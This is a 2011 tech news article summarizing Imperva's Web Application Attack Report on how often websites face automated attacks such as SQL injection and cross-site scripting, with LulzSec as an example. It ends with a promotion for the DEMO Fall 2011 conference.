Wrong. We are all at risk, according to the fittingly titled study, WAAR, or the Web Application Attack Report from data security company Imperva.
The first half of 2011 was big for web-based attacks. Breaches such as the Sony Playstation Network, which shut the network down for nearly a month this spring, made headlines for weeks. But Imperva believes focusing on high-profile cases can actually be a detriment to smaller sites.
“Nobody’s looking at what’s really being attacked,” Noa Bar Yosef, senior security strategist for Imperva’s Hacker Intelligence Initiative told VentureBeat. “Hackers are taking the path of least resistance.”
According to WAAR, hackers are “equal opportunity offenders,” and attacks are widespread. In fact, Imperva reports that web applications of all sizes are attacked every two minutes, or every seven seconds at the peak of an attack. The goal is simple and doesn’t require enterprise-size databases to succeed: The criminals just need to steal your information and sell it on the black market.
Automated attacks allow hackers to be prolific in this task. Between December 2010 and May 2011, Imperva identified four main automated avenues hackers use in attacks. These include:
- Directory Traversal: Hackers focus on private Web registries not through system defects, but a lack of security.
- Cross-Site Scripting: Hackers breach a website’s server, insert a script, which then redirects unknowing visitors to malware.
- SQL Injection: Hackers write code on the website’s server, which can be executed later, enabling easy access for return hackers.
- Remote File Inclusion: Hackers write a script that is activated when the website calls on a file within the server.
These automated attacks allow hackers to play what the WAAR calls a game of “hide and seek.” It’s about secretly harvesting data and selling it. According to the WAAR, online forums allow hackers to quietly sell their data. The report shows a listing for “full site/admin control” to the U.S. Army CECOM, or communications-electronics command, for $499.
When a company or organization secures its websites, oftentimes only identified vulnerabilities are patched. This leads to protection against only one or a couple of the mentioned automated avenues. LulzSec is an example of why this is dangerous for sites. The hacker group used not one but three avenues in its widely covered attacks – cross-site scripting, SQL injection and remote file inclusion. Clearly, patching only one security hole will do little to stop a determined hacker.
“We need to learn from LulzSec,” Yosef said. “LulzSec are hacktivists. [They are] using the same kind of attack for change.” Groups motivated by change often show you how to take actions to the limit. In fact, the U.S. government has already taken measures to define cyber war decorum. Watching groups like LulzSec, which already attacked the U.S. government, may give insight into the future of sophisticated hacking and the lengths to which hackers will go.
Download the full report here.
Got six minutes to launch your game changer? We’re finding top-shelf thinkers from around the world ready to showcase their products at DEMO Fall, on the same stage where companies like Netscape, TiVo, E-Trade, and Java got their start. After you sweat out your six minutes of fame, head off the the DEMO pavilion to chat with potential investors, partners and show off the goods. Apply for your spot here. Demo Fall 2011 is located at the Hyatt Regency in Silicon Valley, September 12-14.
VB's research team is studying web-personalization... Chime in here, and we’ll share the results.